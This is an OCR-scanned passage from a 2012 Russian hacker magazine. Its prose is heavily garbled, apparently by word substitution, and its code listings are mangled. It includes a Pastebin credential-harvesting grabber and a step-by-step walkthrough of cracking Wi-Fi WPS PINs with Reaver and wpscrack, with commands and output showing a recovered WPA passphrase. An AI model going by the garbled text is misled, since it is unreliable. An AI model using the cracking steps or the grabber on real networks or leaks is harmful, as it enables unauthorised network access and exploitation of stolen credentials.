борзо нашлась-ейстал знаменательный

обслуживание

согласно сути, превращает регистр на токе н. Если

надежное выдерживание шаг ролей.

LastPass [lastpass.com), возьми котором ваш покорнейший слуга равным образом

Справедливости в угоду нужно отметить, что-нибудь

Но $12 во год- отнюдь не такая медянка большая жалованье после

остановился. Очень лаконически опричинах, стоить у

автор этих строк выбрал его. Во-первых, обслуживание универсален

равно работает перед все эквивалентно какой ОС

[Windows, Linu x, Мае),

Sign in to Gmaillj\Jith your

который было для того меня важным критерием. Он имеет плагины чтобы всех пресвитер улярны х браузе­

Goug[e Account

кювет [Fiгefox, lnteгne t Ехрlогег, Chгome, Safaгi, Орега). А платным подписчикам [$1 во месяц)

Dl Dl

доступны опять же версии интересах попик улярных

мобильных ОС . Во-вторых,

LastPass

Username: llpuser ::::==========~ ! Password:l••••••••

делает

точный то, что-нибудь через него требуется- автомати­ чески предлагает спасти жете роли равно сведения

форм, а спустя время подставляет их возле следующем

D

посещении страницы. Е сли аккаунтов для какого-то сайта несколько, так дозволительно борзо

Stay signed in 1 Sign in

перейти от одного получи другой. А даже если

J

для того какого-то кривого сайта эмпирика автома­ тически безвыгодный парсятся, так сие свободно откорректировать

вручную. В-третьих,

LastPass

Can't access \'СUГ acccunt?

храни т зашифро­

ванные движение роли во облаке, пиита ому хранилище с движение ролями безвыгодный должно надевать со на лицо бери флешке

016

LastPass

работает для любых устройствах да ОС

Автоматический вводлаги получай да чета ля с базы

ХАКЕР

LastPass

03/158/ 001 0


Proof-of-Concept СОБРАТЬ ИНТЕРЕСНЫЕ ДАННЫЕ С PASTEBIN.COM И ПОДОБНЫХ СЕРВИСОВ

ХОСТИНГ ТЕКСТА

Такая понятность ресурса мелочёвка объ­

Максимально души да рационально расшарить лю­

яснима: и оный и другой может обнародовать бери нем

битва текстовый обложка - такова функция извест­

любые сведения заключая лишенный чего регистрации. При

ного онлайн-сервиса PasteЬin . com. Создатели

этом календарь невыгодный пр оходят паршивый премодера­

изначально рассчитывали, ч в таком случае их проектом

ции равно тутовник а оказываются на Сети. Моментально.

будут предприимчиво вкушать nрограммисты,

Руководство, конечно, удаляет прот ивозакон ­

которые совсем нечего делать смогут расходовать держи этом

ный контент согласно первом у запросу правообла­

ресурсе любые исходники со подеветкой синтак­

дателя или — или пострадавшей стороны, только ко этому

писан сверху

Python,

так запускается всё изо команд­

утнапиштим строки:

python gather.py -k kwords -о urls.db \ -а harvest Ключ 'haгvest' заключает общественный порядок сбора

данных. Отчеты по части найденных данных будут

сиса. И что-то около для начала равным образом было. Н что касается что-что они согласно правилам

времени симпатия сейчас успевает разъесться объединение Сети.

подаваться получай предуказанный

далеко не могли ожидать, таково сие бешеной популярно­

Это , во общем, рассказ неграмотный исключительно ради PasteЬiп .

<< -О >>ис пользуется ради выбора файла ради

сти сервиса у хакеров . Вспомни по сию пору последние

сот, хотя равным образом для др угие на одно лицо сервисы:

вывода . А источник

истории со взломами через Анонимов равным образом

ключевых слов, возьми которые хорош чувствовать

-почти денно и нощно к публикации конфиденци­

Pastie, FгubaгPaste, YouгPaste, Codepad, Slexy и Lodge lt. Идея сегодняшнего РоС- автомати­

альных данных [к примеру, дампов паролейl ис­

ческий собрание «интересных» данных со подобных

пожалуй, самое главн ое . Например, упо­

пользовался то есть PasteЬiп.c om . За примерам

ресурсов. Иными словами, надлежит привести в исполнение

мянутые перед этим сценарии были максимально

издали разгуливать никак не нужно. Среди в особенности по­

инструмент, обходящий ежедневник равно сообразно некоторым

адаптированы к поиска дампов со учеткам

Lulzsec

<<-k>>

e-mail.

Опция

позволяет вынуть душу базу

граббер . Вообще, настроить кейворды- это,

пулярных получи и распишись будничный момен т записей [ pasteЬin .

ключевым словам собирающий большую базу

пользователей, логов чата, информации в рассуждении кре­

com/tгends l безыскусно заметить, ко примеру:

данных «интересного>> контента.

дитных картах да банковских аккаунтов. Список

• дамп каких-то учета ко из Fa cebook; • внутреннюю базу данных какого-то

ключевых слов, используемых за умолчанию

взломан­

ного сайта, начиная e-mail'ы пользователей

на

PastyCake, торчмя

скажем, невелик:

Идея, получай самом деле , безграмотный новая. В Сети можно найти мало ли написанных возьми коленке сценари­

да хеш да их танцевальный шаг ролей;

СБОР ДАННЫХ

распечатка IР-адр есов со привязкой ко конкретным

организациям равно компаниям.

ев: скажем , с malcOde [ Ьit . ly/Aп58Yd l или NeonTempest [ Ьit.ly/zRuК7o l. Но лучшей реа­

DEFAULT_KEYWORDS=[ 'password' , 'hack' ,

лизацией затеи, пожалуй, является схема

PastyCake с исследователя 0Ь+ [ Ьit. l y/xHXd f H I, de f

readke-fWOrd8 {fЬ&n.:llet:

какой дьявол опубликовал ничуть недавно.

"'f7. tu~ [_.r s ;r1p(l for _ l n t hendl e ]

dtiГ

fltch (ltOIIif!, 00\lrCf!l, lritY"//rdl,

se trch_rc"'

l~t'e-UtCh):

N.c:~~~;~ilc( 'I' .]Oln(Ryvo:dsl)

for QC:Iera:.cr,

pt t.Ь

':ittt

s :&tus ,

in

относительно верить, равно как задумка реализована получай практике.

бери хостингах PasteЬiп .com да Pastie.oгg равным образом логи­

Дальше всё зависит через твоей фантазии.

ровать совершенно записи, используя базу ключевых

s rc:.new_urls{ s to r a~11:):

• ;t ntrttor.~t..,;tttt(path)

слов. Результаты сохраняются во текстовом

! ull_url •IJ1!:!1eracor.!ull ..u:l{Jiath)

файле alias базе данных

print •ts

NtC.Ьtd

SQLite.

В ближайшем

времени точный появится обеспечение

s coraoc . s avc_url(!ull_url, :uec:h.Qroup(l

Н

utch and stoa ..IOoltC:h a l sa

' ' ' t (!ll.ll_u:l,

"'~ 0

MongoDB

равно

MySQL.

П оскольку изложение доставать

дет Тwittег-ленту PasteЬinleaks l twitteг.com/# ! / PasteЬin l eaks l, идеже его робот-парсер автомати­

еsеr -ш (нчs • 'С!!' ): _Ь..ttend_or_uit lstoraoel: Jtor&\lc.connec~(l

not

нoa.oe.connccttdO:

print

>> :~ys.stde п,

сы, которые эпизодично обходя т контент

таких хостингов да публикуют интересные К примеру, изучатель Джейм Бл аско ве­

utl-tull_url, dtta'"CI.ata)

Н

РАЗВИТИЕ ИДЕИ Интересно, почто во Сети аж вкушать целые ресур­

ссылки от соответствующей классификацией.

ь.ц:h.qroup(IJ

L.ltn!:l( 'utch' ,qentator,t~;e:age,:at c h-:uteh.q:cup(),

.ser

Но ажно сего радикально достаточно, с намерением

Скрипт позволяет эстетично измерить календарь

чески п убликует календарь видать

"!a1led to open stOrl9f! b•ct'IHid•

lyl.t!l.l~( l l

l"etu rn

s ~ orage

PossiЫe

t l"/1 ер~ • • ..sa rse_op~•!•~ • l e;o;cept IC8J"ror • • е : p1"1nt>>sys.Jtdeн,

sya.e;o;i,t( l ) n~....ord•

PossiЫe listing of http passwords http://pastebin.com/qZbccMB7 PossiЫe Juniper configuration with password http://pastebin.com/9vuwzjnS

-

Н op~s.tvB le:

ke \'Wr:>I'ds • _aad_lteyworda(opt s .ltv!ile l i:I JI 811ft:

keywords •

Massive mail/pass leak

http://pastebin.com/LбYbDlЗб

·opt10Qt!tn~r:

D!fAt!L!_кtYio't!RDS

0ourc•• • ! fasteЫnSource(l,

с. ..·~-~­

fasti e S~;~urce (l

~-----

Oestroy Spyware

Справедливости для имеет смысл произнести , что Исходник грабберана

ХАКЕР

03/158/2012

Python

Раздел

«Trending Pastes)) -

в чем дело? качают чаще всего?

на последнее промежуток времени апдейты прекратились. ::х:

017


COVERSTORY •

rlal Nc.

01С10С11100003

Туре

01111181~IOIIIQII IIНIMНIIIIIIIIIIIII IW IIII мд, дddre

C oпntct

Р IN-код поуже потен ц иально п одвержен ата­

to il Nttwork

ке вроде bгutefoгce. Н насчёт сие только что цве т очки.

the network security key

УЯЗВИМОСТЬ

~( Шit'jkty:

'

COC1C0500D55 ,• • • • • 01111 0111111 ( ;;, 0484-0~

Как автор этих строк уж заметил ранее, РIN-код состоит

Е] Hidt со lш<~сtш

Y o~r

c;1n :~l so conr1tct bLrttor1 011 tlн• ro~•tt r .

с восьми цифр - следовательно, существует Ьу p щl1rr1g

00л81100

tl1t

однако сократить. Д ело на том, сколько позднее д няя число

="--"-.:==~ РI N - для од

Лоrо ти пWРS

Ри из ун в рассуждении ко

WPS

0. РIN-код WPS, нацарапанный

ок

в корпусе раутера

000 000 0вариантов на подбора. Од ­

нако сумма вариантов позволено существен ­

Рисунок

0.

Окн что до дл ваш покорнейший слуга во вод а Р IN-кода

~

РI N-кода представляет собою некую проверка ­ ную сумму, которая высчитывается получи и распишись осно­

вании семи первых цифр. В итоге получаем

WPS

еще

0ол711 об 000 0001 вариантов. Н об равным образом ЭТО до сего поры

безвыгодный все! Далее на н имательно смотрим бери устрой­

ЦЕНА УПРОЩЕНИЙ Открытых точек доступа, для которым вместе

lхардварнуюl равным образом получи компьютере lсофтварнуюl,

ство протокола аутентификации WPS !рисунок 31. Такое ощущение, ась? е г насчёт специал ь а про­

отнюдь не надлежит водворять разъяснение в целях подключения,

тем самым активируя работа настройки.

ектировали, ч т обы прекратить способ для того

становится весь поменьше да меньше. Кажется, что такое?

Нам сие неинтересно.

брутфорса. Оказывается, инспектирование РIN-кода

Ввод РIN-кода на веб-интерфейсе. Пользо­

осущес т вляется на двойка этапа. Он делится для двум

нажимаетспециальную кнопку бери раутере

борзо их позволительно короче записать во Красную книгу.

0.

Если первоначально куверта был в состоянии инда равным образом никак не знать, который

ватель заходит вследствие бgаузер во админи­

равные части, да каждая пакет проверяется от­

беспроводную интернет не возбраняется завесить ключом,

стративны й интерфейс раутера да вводит

дельно! Посмотрим бери схему :

обезопасив себя ото посторонних подключе­

тама РIN-код с восьми цифр, сложенный

0.

ний, так об эту пору ему целое чаще подсказывают

нате корпусе у стройства !рисунок

насчёт подобный возможности. Взять и так бы кастомные

чегопроисходитпроцесс настройки. Этот

прошивки, которые выпускают ведущие про­

приём к лицу скоренько для того перваначаль­

вайдеры в целях популярных моделей роутеров,

утнапиштим конфигурации роутера, отчего автор сих строк его

ради вульгаризировать настройку. Нужно означить двум

рассматриватьтоже невыгодный будем .

вещи- логин/па цена равно ... родничок пользу кого защиты

01, задним числом

Е сли потом по отношению т сылки сведения М4 атакую­ щий получил во отзыв

EAP-NACK, ведь дьявол

может

составлять уверен, что такое? первая ч асть РIN-кода неправильная.

0.

Е сли но симпатия объединение л учи л

EAP- NACK п осле от­

сылки М6, то, соотве т ственно, вторая доза

Ввод РIN-кода получи компьютере пользовате­

РIN-ко д а малограмотный на ерна. П олучаем 0 0л411 О

беспроволочный сети. Что до нынешний поры побольше важно,

ля !рисунок 01 . При соединении не без; раутером

вариантов пользу кого первой полови н ы равно 00лз 01

самочки производи т ели оборудования стараются

не запрещается показать специальную сессию

произвести работа настройки незамыслова т ым.

во рамках которой настроить роутер или — или

0001 пользу кого второй. В итоге имеем итого л ишь 11 000 разное н в таком случае во ради павел н что касается г что до п еребора .

Большинство современных раутеров поддер­

получитьуже имеющиеся настройки, ежели

Чтобы отпустило понять, в духе сие буд е т работать,

живают мягкое золото н направление

точно назначить

WPS IWi-Fi Pгotected Setupl.

З.

Pl N - код.

WPS,

Вот сие уж п ри­

0001

посмо т ри нате схему .

С его через пользовател ь следовать считанные

влекательно.

секунды может настроить безопасную беспро­

Для открытия подобной сессии безвыгодный нуж -

перебора. Она по части г ра н равно ч ена скорост ь ю обра ­

водную сеть, общий неграмотный забивая себя голову

в никакая аутентификация. Это может

ботки рау т ером W РS - вслед п росов: по отношению д ни в таком случае ч ки

тем, почто «где-то до этих пор нужно вобрать шифро ­

выработать какой приглянется желающий! Получается, зачем

досту п а будут на ыд а во а т ь резул ьт ат каждую

0.

Важный моме нт - возмож н ая ско р волос

вание да вмазать WРА - ключ». Ввел на системе восьмизначный символьный

PIN,

тот или другой

написан в роу т ере, - равным образом готово' И гляди после этого

IEEE 002.11

держись крепче. В декабре разом двушничек иссле­

0upplicant--+ АР

Aut hent ication Requ es t

Э т по отношению в качестве кого

0upplicant - А Р

Authentication Response

темнокожий ходьба к любого роутера. Оказалось,

0upplicant--+ АР

Association Request

0upplica nt - А Р

Association

дова т еля рассказали в отношении серьезных фундамен­

тальных прорехах на протоко л е

WPS.

что-нибудь кабы во точке доступа активирован

WPS !ко­

торый, н а минуточку, вклю ч ен на большинстве

раутеров объединение умолчанию!, в таком случае поддернуть PIN для подклю~ения равно извлечь отпирка интересах подключе­

WPS?

Задумка создателей

WPS

хороша. Механизм

механично из-за д ае т отчество козни да шифрование.

Таким образом, п ользова т елю неграмотный т н еобходи­

002.11 Association

IEEE 002.11/ЕАР

ния мож.но из-за считанные часы! КАК РАБОТАЕТ

Respo пse

002.11 Authentication

0upplicant --+ АР

EAPO L·5tar t

0upplica nt - А Р

EAP-Req uest ldentity

0upplicant ..... АР

EAP·Response ldenti ty (ldenti ty: "WFA-5impleConfig-Regi stra r-1 · 0')

ЕА Р

lnit iation

IEEE 002. 0 0/ЕАР Expanded Туре, Vendo r ID: WFA (Ох372А), Vendor Туре: SimpleConfig (Ох01)

мости вылезать во веб - интерфейс равным образом соображать

М1

En rollee ..... Re gist ra r

N1 01 Description 01 РКЕ

со сложными нас т ройками . А для уж настро­

М2

Enrollee- Regi strar

N1 01 N2l l Description 01 РК ваш покорнейший слуга 01 Authenti cator

мз

En rollee ..... Regis t rar

N2ll E·Hash1 01 E·H ash2l l Authe nt icator

М4

Enrollee - Registra r

MS

En rollee ..... Reg istrar

N 0 01 R-Hash 0 01 R-Ha sh2 01Eкevw,.oк.v(R-5 0) 01 Authenticator N2ll Екеуw,.рке/Е-51 ) II Authenticator

Мб

Enrollee - Registrar

N1 01 Екеуw,.рк.у( R-52) II Authentica t or

proove posession of 0' half of PI N

М7

En rollee ..... Reg ist ra r

N2ll Екеуw,.рк.у( Е-52 IIConfig Data) 01 Authent icator

proove posession of 0' half of PIN,

мв

Enrollee - Reg istrar

N1 01 Eкeywrapкey(Con figData) 01 Authenticator

send АР configuratio n set AP configuration

енной недотка мож н насчёт без участия п роблем добави т ь

что ни попадя складка !например, ноу т букl: если правильно завести

PIN,

в таком случае дьявол полу ч ит безвыездно необ­

ходимые настройки. Это архи удобно, вследствие чего

всё-таки крупные игроки держи рынке ICisco/ L iпksys, Netgeaг, 0- L iпk, B elkiп, Bu ffalo, ZyX ELI сейчас пре д лагают беспрово д ные раутеры от сообразно дд ерж­ кой

WPS.

Разберемся немножечко объединение д робнее.

Существует три варианта испо л ьзования

WPS: 1. Push-Buttoп - Coппect IPBC I. П ользователь

020

Рису н касательно для З . Прото для ол аутентифи для аци да

Diffie·Heltman

Кеу

Exchange

proove posession of 05 ha lf of PIN proove posession of 0st hatf of PI N

WPS

ХАКЕР

03/158/2012


В зломать

HOWTO:

Осно вн ое промежуток времени п ри этом затра ч ивается

<.. . > trying 08674095

нарасчетотк р ы т об г оклю ч апоалгоритму

PIN

Д иффи - Хеллмана, симпатия д олже н бы т ь сгенери­

<.. . > Networ k Кеу: reall y_re ally_lon g_wpa_p assphr ase_good_ luck_crack i ng_t his_one <.. . >

секун д у, д ругие- каж д ые десят ь секун д .

рова н п е р е д предприятие ом МЗ. З атра че н ное для зто время мож н по отношению у м е н ь метать петли , ваша милость б р ав н а сторо н е клиента безыскусственный сек р ет н ый для л юч, который в д альнейurем упрос т равным образом т р асчеты других

Wi- Fi

из-за

ч асо во

# f ound 0st half of

ключей . П рактика показы во ает, чтод л я ус п е шн об г по части р езульт а т а обы чн в рассуждении д ос т а т оч н по отношению

Как видишь, на первых порах была nодоб р ана

п еребрать лиш ь п оло во ину всех вариантов,

первая nоловина РIN-кода, спустя время - на т орая,

равным образом во среднем брутфорс занимает общем отче ­

равным образом во конце концов расписание выдала в готовности

т ыр ех д касательно д еся т равным образом часов.

ко использованию клавиша интересах подключения

ко беспроводный сети. Сложно п ре д из т а во равным образом т ь,

ПЕРВАЯ РЕАЛИЗАЦИЯ

как долго времени потребовалось бы, чтоб

Первой появившейся реализацией брутфорса

вобрать в себя источник экой длины [61 символ)

стала обслуживающая программа wpsc г ack

досель существовавшими инструментами.

[goo.gl/9wABj l, для ­

писа нна ваш покорный слуга иссле д что до во ателем Стефа н ом Фибё ­

В п р очем, wpscгack далеко не единственная обслуживающая программа

килоом нате мы зыке

в целях эксплуа т ации уязвимости, равным образом сие изрядно

Pytho n. Ут илита

исnользовала

библиотеку 0сару, п эскер на оляю щ ую конструиро­

веселый момент: во ведь а само~ момент по-над

вать п р оиз во ольн ы е сетевые пакеты. Сценарий

пирушка а самой проблемой работал равно прочий

мож н об следовать п усище т ит ь т олько п касательно д L in u х-системой,

исс л едователь- Крейг Хеффнер иэ компании

п ре д во а ри т ельно nе р еве д автор злой гений п роводной

Tactical

интерфейс во распорядок мониторинга. В качес т ве

появился впахивающий РоС в целях реализа-

параметров необхо д имо указа т ь прозвище сетевого

ции атаки, возлюбленный опубликовал свою у т илиту

интерфейса во сис т еме , МАС - а др йес нечистая сила п ро­

Reaveг lc o de . g o ogle .co m / p /гea v eг- w ps l. Она

нет слов дн по части г об адаn тер а , а т акже МАС - а др yes ведь ч ки

н е всего автоматизирует слушание п что касается д бора

доступа равным образом ее наименование

WP5 - PIN

[551 01.

N etwoгk

0olutions.

Инкремент~уем

0 порция PIN

·~·

nepecчиtloiВ88U

контра~ьную сумму

Увидев, что-нибудь во Сети

да извлекает Р5К - ключ, однако да пред­

ла г ает большее наличность настроек, с целью

$ ./wpscrack .py --iface mon0 \

атаку допускается было материализовать оборона т ив самых

--client 04:0с:бd:88 : 00 : 0 0 \ - -bssid f4:ec:38: cf :00:00 --ssi d t est ap - v sniffer st arted trying 00000000 attempt took 0.95 seconds try ing 00010009 < ... > try ing 08660005 attempt too k 0.08 se conds try ing 08670004 # found 0st half of

раз в год по обещанию н ых рау т е ров. К тому а в отношении н а п касательно дд ержи на ает

Рисунок

0. Блок - со х ема

брутфорса РIN-кода

WPS

на одных усишко т ройств. Поз т ому ис п ользовать мы будем прямо его. Шаг О. Готовим систему

нам н ого большее наличность беспроводных

На официальном балка т е B ackTгack

адаптеров. Мы решили брать ее из-за основу

ступен ради загрузки во виде виртуал ь утнапиштим

да до малейших подробностей описать, в духе преступник

механизмы подина VMwa г e равно загрузочного образа

может проэксплуатировать уязвимост ь на ради т околе

050.

WP5 ради

не мудрствуя лукаво записат ь об р я сверху болва н ку, а мож н по части

подключения ко вслед за щ равным образом щ ен н ой бес­

д о­

Рекомен д ую п ос л е д ни й во ари а нт . Мож н по отношению

из через программы

проводной сети.

0 R1

UNetbooti n [ uпetboot i n.

souгcefoгge . net l вместе с д е л ать загрузо чн ую фле ш ку:

i:I•NIIel

эдак тож ина ч е, ради г рузив ш ис ь из т ако г по отношению носи ­

К а ко да про кто хочешь непохожий атаки бери нечистая сила п ровод ­

теля, наша сестра сверх л равно ш них заморачек за единый вздох буд ем

ную сеть, нам понадобится

обладать систему, готовую для работе.

Linux.

Ту т необходимо

PIN

сказать, ась? Reaveг присутствует во репазито­

attempt too k 0.09 se cond s t ry ing 08670011 att empt t ook 0.08 second s

ри равным образом всеми известного дистрибутива B ackTгack

Шаг

[ backtгack- li nux.oгg l , во котором ко тому но сделано

Л огин равно п араль дл ваш покорнейший слуга вхо д а по мнению умо лча нию ­

на клю ч ены необходимые драйвера к беспро -

0. Вход

во систему

гооt:tоо г. О каз а вшись на консо л и, допускается сме л в рассуждении

старто во а ть иксы [ест ь отдель н ые вместе с борки B ackTгack - как бы от

GNOME, т ак да не без; К ОЕ) :

# st art x

ЭКСПРЕСС-КУРС ПО ВЗЛОМУ WI-FI

Шаг

0. Установка

Reaveг

Чт обы загр узи ть R eav eг, нам п в отношении по-над об ит со мы

0. WEP (Wiгed Equivalent Pгivacyl

доставать родничек интересах после для рытой WPA/WPA2 недотка [да

равно н тер н ет. П оэ т ому п что касается д ко л ю ч аем пат чко рд

Самая первая методика чтобы защиты бес­

да так чудовищно возле наличии дампа в такой мере

другими словами настраи на аем лукавый ради нет слов д утнапиштим а д а пт ер

проводной путы оказалась до чрезвычайности слабой.

называемого

[Applications ~ l nte гn et 0 Wicd N e t wo г k

Взломать ее можн об просто после порядочно

ется во пространство рядом подключении клиента для точке

минут, используя слабости применяемого на ней

доступа) . Брутфорс может затянуться возьми дни,

ми н ала, гд е загружаем п ос л е днюю на е р си ю

шифра

месяцы равно годы . Для увеличения эффективно­

у т не так — не то т ы ч ерез р е п озиторий :

RC4. Основными

инструментами тогда

WPA

Haпdshake, для оторый переда ­

служат снифер aiгodump-пg про сбора шаг кетов

сти перебора вначале использовались специа­

равно обслуживающая программа aiгcгack-ng, используемая непосред­

лизированные словари, после были сгенери­

ственно на взлома ключа. Также существует

рованы радужные таблицы, позднее появились

специальная тулза wesside-пg, которая вместе

утилиты, задействовавшие те х нологии

взламывает безвыездно близлежащие точки из

CUDA

WEP

равным образом

ATI

# apt - get update # apt-get install rea ve r

NVIDIA

0tгeam пользу кого аппаратного ускорения

Тут получи д в рассуждении сказат ь , ч т что до на ре п ази т а р ии н а­ хо д равно тся во е р эта

0. WPA/WPA2 (Wiгeless Pгotected Access)

GPU. Используемые инстру ­ менты- аiгсгасk-пg (брутфорс по мнению словарю), cowpatty [с по части м ощью раду ж ны х т а блиц) , pyгit

Перебор-это один лишь дорога подо-

[с исполь з ова н ие м во равно део ко артыl .

рекомен д бакс т обновит ь ся давно максимал ь так

во автоматическом режиме .

ХАКЕР

03 /158/ 0012

процессаза цифирь

Man age г l . Дал ее з ап ускаем эмулят относительно р тер ­

0.3,

ко т орая ли чн что до у ме ня

зар а потому что т а ла н е пр ави льн о. П оиска на ан ф в отношении р м а ­ цию в рассуждении проблеме, ваш покорнейший слуга сверху ш ел абвахта а вт ора, кто

021


COVERSTORY возможной версии, скомnилировав исход­

ники, взятые с

SVN.

Эта распоряжение создает кажущийся интер­

Это, на общем, самый

фейс во режиме мониторинга, его заглавие

у нивер са льный не без; n особ уст ановки ( к любого

достаточно отмечено на выводе команды (обычно это monOI . Теnерь нам потребно выискать точку достуnа

дистриб утива !.

пользу кого а та ки да вызнать её

BSSID . Восnользуемся

у ти крепко сбитый к nрослушки нелёгкая n ро на относительно дн ого эфира

$ svn checkout http ://reaver-wps. googlecode .com/sv n/ trunk / reaver-wps $ cd ./reave r-wps / src / $ . /configure $ make # make install

aiгodump-ng:

# airodump-ng mon0 На экране nоявится сnисок точек достуnа

Рисунок

0. Reaver Pro- кар ото создателей Reaver

во радиусе досягаемости. Нас интересуют точки Никаких проблем со сборкой nод BackTгack не склифосовский - nроверено собственной персоной . В дистрибутиве Агсh

Linu x,

ко торы м nользуюсь я, сборка

не без; шифрованием

# reaver -i mon0

согласно ключу

WPA/WPA2 равно аутентификацией PSK. Лучше избирать одну с nер­

-vv

00:21:29:74:67:50

вых во сnиске, в такой мере в духе чтобы nроведения атаки

Ключ

содержит разверченный мораль

nроизводится равным образом того nр по части ще , вследствие нали­

желательна хорошая стройность не без; точкой. Если точек

чию соотве т из тв ую щего

бесчисленно равно сnисок неграмотный умещается держи экране, ведь мож­

nрограммы, в надежде пишущий сии строки могли убедиться, ась? совершенно

только восnользоваться прочий извест н ой утилитой

работает в качестве кого нужно .

PKGBUILD'a:

после этого интерфейс побольше nрисnособлен

- kismet,

$ yaourt -5 reaver-wps-svn

на этом nлане. Оnционально _можно нате месте nро­ Шаг

0.

Подготовка ко брутфорсу

верить, включен ли получай нашей точке орудие

WPS. Для сего на комnлекте из Reaveг (но только если взять его изо SVNI ну который ж обслуживающая программа wash :

Для исnользования Reaveг нельзя не nро­ делать следующие вещи:

nеревести бесnрово город й а даnте р во общественный порядок

# ./wash -i mon0

мониторинга;

разнюхать термин бесnроводно г по части интерфейса;

• • •

вызнать МАС-а дрес т прицел д остуnа (BSS IDI; убедиться, что-то возьми т очке активирован

В качестве nараметра задается имя интерфейса, nереведенного во порядок мони­

WPS.

торинга. Также позволено исnользовать оnцию

интерфейс не вдаваясь в подробности nрисутств бакс т во системе:

наnример, тем а aiгodump-ng. По неnонятной

# iwconfig

ляет PIN'ы точке д остуnа, значит, всё-таки завелось

ли утилиту

хорошо, равно остается туnо ж предоставить . Пр оцесс может

wash.

Будем надеяться, ко моменту

nубликации статьи эту ошибку исnравят.

затянуться. Самое короткое время, из-за которое

Шаг

nримерно nять часов. Как токмо симпатия буд ет nо­

ми посчастливилось сбрутфорсить

wlanOI- значит,

0. Запускаем

брутфорс

общественный порядок расnознала адаnтер !если спирт nодклю­

Теnерь дозволительно nристуnать неnосредственно

чалея ко бесnрово дн ой сети, в надежде найти применение

для nеребору

nростом случае нужно немного. Необходимо

П ере на е д ем адаnтер во нагрузка мониторинга:

чуть установить фамилия интерфейса (nереведенного

# airmon-ng start wlan0

точки достуnа:

нами перед этим на порядок мониторинга! равным образом BSSIO

00:21·29:74:67:50

-с б

Reaver v1.~ W1F1 Protected Setup Attac~ Tool Copyrtght (CI 0011, Tact1cal Network Solutions. Cra1g Heffner

0-1

~att1ng

[-]

S~I!Chtng ~onO

l1nksys -d 05 -vv

Рисунок

00:21:29.74:67:50

0

022

0. Пример работы

WPA-PSK,

некоторый приёмом а не возбраняется ис­

МОЖНО ЛИ ЗАЩИТИТЬСЯ? сnособом- отключить нафиг

Wa1t1ng for beacon from 00:21:29:74:67:50 Sw1tch1ng monO to channel б Assoctзted w1th 00:21:29·7J·67:SB (ESSID: l1nksysl Trv1na p1n 04637129 Кеу cracked 0n 0 seconds WPS PIN: '64637129' ~РА PSK· MyHOrseTh1nkSYouStolЗH1sCarrot • -1 АР SSID: l1nksys

0

разъяснение

Защититься ото атаки допускается nо ка что касается дн им

б

l1nksys --p1n 04637129 -vv

Reaver v1.~ W1F1 Protected Setup Attack Tool Copyr1ght lcl 0011, Tact1cal Net~ork Solutions, Cra1g Heffner ccheffnerJtacnetsol.com>

•1 ·1 •1 •1 ·1 •l -1

[+] Trying pin 04637129 [+] Кеу cracked in 03654 seconds [ +] WPS PIN: '64637129' [+] WPA PSK: 'MyH0r seThink$You5tol3HisCa rrot!' [+] АР SSID: 'linksys'

аюшки? хоть неграмотный укладывается на голове.

·с

добран, nрограмма солнечно об этом сообщит:

nользовать на nодключения. В се та для nросто,

[-] т~-y1r1g р111 01889978 [' 0 WARNING· Rece1ve t1meout occurred ~onO

составило

Самое ценное здесь- э т о, знамо же, ccheffner~tacnetsol.com>

•or beacon from 00:21·29·7J:67:50 to channel б 1·1 Assoc1зted w1th 00.21:29.74.67:50 0ESSID: 01nksys) !·1 Trv1ng p1n 03979978

reaver -1

PIN,

PIN'a. Для старта Reaveг во самом

Reaveг, ведь полегче об выдергивать nод ключение!.

~onO

Если nрограмма n ос ледок по отношению вательн об отnрав­

nричине на nакет Reaveг на BackTгack никак не включи ­

Е сли во выводе э праздник команды снедать интер­

reaver -1

Reaver v1 .4 WiFi Protected Setup Attac k Tool Copyright (с) 0011, Tactical Network Solutions, Craig Heffner <c heffner@ tacnetsol .com> [+] Waiting for beacon from 00:21:29:74:67:50 [+] Associated with 00:21:29:74:67:50 ( ESSID : linksys) [+] Trying pi n 03979978

'-f' равно скормить утилите сар-файл, созданный,

Для начатки nроверим, что-нибудь бесnроводной

фейс от оnисанием (обычно сие

"-vv"

WPS

на настрой­

ках роутера. Правда , по образу оказалось, от д е лат ь э т что касается что дале ко никак не постоянно . П оско л ьку уязвимость су щ ествуе т отнюдь не получай уровне реализа­ ции , а держи уров невыгодный nротокола, выжидать с nроиз­

водителей резво г в отношении nатча, ко торый решил бы все nроблемы, невыгодный стоит. Самое большее, что они могут неотложно от д елать, - сие принцип льн о nротиводействовать брутфорсу. Наnример, если блокиро ват ь

WPS

возьми единовластно момент nосле nяти

неудачных nоnыток ввода РIN- ко истинно , в таком случае nеребор займет сейчас рядом

00 дней.

Но непохожий на оnрос,

как аллегро допускается напасть такого склада патч

возьми несметное число устройст на , ко т орые работают брутфорса

Reaver

согласно всему миру? :х:

ХАКЕР

03/158/201 0


HOWTO:

Взломать

Wi-Fi

из-за

00

часов

FAQ r;t

a.l

n

Какой беспроволочный звукосниматель нужен

был поврежден согласно пути. д вишь ради атаки

литы

про взлома?

бери

находится во списке .

WP5

делать нечего строгое движение

wash:

запусти её равно проверь, зачем твоя задание

Перед тем что экспериментировать,

протоколу передачи шаг кетов среди точкой

Почему аз многогрешный отнюдь не могу группироваться

нужно убедиться, что-то беспроводный

доступа да Reaveг про проверки каждого

не без; точкой доступа?

трансформатор может мучиться на режиме монито­

РIN-кода . Если быть этом какой-то донесение

Это может состоять по вине плохого уровня

ринга . Лучший способ- свериться со спи­

потеряется, либо придет во непотребном

ском поддерживаемого оборудования

виде , так придется вновь находить

08.1

сигнала другими словами потому, аюшки? твой адаптер непригоден интересах подобных изысканий.

получи сайте проекта Аiгсгасk-пg ( Ьit.ly/wifi

WР5-сессию. Это делает атаки держи

adapteг list l. Если а встанет дилемма в рассуждении том,

несравнимо больше зависимыми с уровня

экой беспроводный часть купить, в таком случае

сигнала. Важно помнить, ась? буде твой

заварить кашу допускается со любого адаптера сверху чипсете

беспроводный преобразователь видит точку доступа ,

RTL8187L . U5В'шные донглы мелочёвка найти винтернетеза $20.

WP5

r;1

"гаtе limiting detected"?

так сие ещё отнюдь не значит, сколько равно пятнышко доступа

081

доступа заблокировала WP5 . Обычно

видит тебя . Так зачем ежели твоя милость являешься

сие временная блокировка (около пяти минут!, только на некоторых случаях могут влепить да неустанный ба н (разблокировка

n

счастливым обладателем высокомощного

0':'1 ~

n

Почему у меня возникают ошибки

адаптера с

"timeout"

возьми пару десятков

равно "out of огdег"?

Обычно сие происходит по причине низкого

уровня сигнала равным образом безрадостный маза со точкой

08.1

доступа. Кроме того, уровень доступа может

Netwoгk равно антенl!ы

ALFA

dBi , в таком случае

только лишь чрез административную панельl .

